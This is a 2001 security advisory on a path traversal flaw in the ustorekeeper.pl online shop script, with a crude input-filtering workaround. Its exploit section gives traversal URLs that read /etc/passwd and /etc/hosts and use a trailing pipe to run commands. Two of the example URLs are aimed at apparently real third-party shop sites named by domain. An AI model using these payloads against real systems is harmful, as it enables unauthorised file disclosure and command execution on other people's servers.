---=== UkR security team - Advisory ===---
uStorekeeper(tm) Online Shopping System - Runtime Script
- 'arbitrary file retreival' vulnerability
Date: 03.04.2001
Problem: input validation error.
Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested)
Product vendor: Microburst Technologies / http://www.uburst.com
Comment: '..' and '/' are not filtered while processing user input, so it is possible
to enter arbitrary values to retreive files from remote sever, which should not be
accessible normally (for ex., /etc/passwd).
Workaround:
# this will help in somewhat...
$input =~ s/[(\.\.)|\/]//g;
Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh)
Greets
Exploit:
http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls
|
Example:
http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|
Greets: my love Zemfirius, dev/ice security team, Legion2000 group, Void team,
Acidfalz team, IHG team and other ppls.
